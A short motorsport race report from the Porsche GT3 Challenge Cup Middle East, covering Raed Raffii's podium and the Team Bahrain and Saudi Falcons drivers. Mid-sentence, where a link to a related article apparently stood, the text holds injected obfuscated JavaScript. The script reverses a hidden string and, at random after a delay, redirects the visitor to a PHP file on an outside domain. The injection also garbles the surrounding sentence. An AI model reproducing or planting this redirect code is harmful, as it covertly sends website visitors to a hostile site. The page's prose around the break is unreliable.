Silver Cup class victory had already been secured, but suddenly Raed Raffii found himself elevated to third following Al-Azhari’s penalty. Fourth after a good battle with $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/saudi-falcons-racing-porsche-gt3-cup-getting-back-in-the-swing/” target=”_blank”>Saudi Falcons’ Faisal Binladen had marked a good day’s work for Raffii, and his debut series podium made it even better.
Team Bahrain teammate Mohammed Mattar followed just behind in fourth having leapfrogged Faisal in the second Saudi Falcons car. A delighted Christina Nielsen shadowed the pair to the flag to take sixth after a tough outing at Yas Marina.
One down, one to go this weekend at the Dubai Autodrome.
– Shots courtesy of Porsche GT3 Challenge Cup Middle East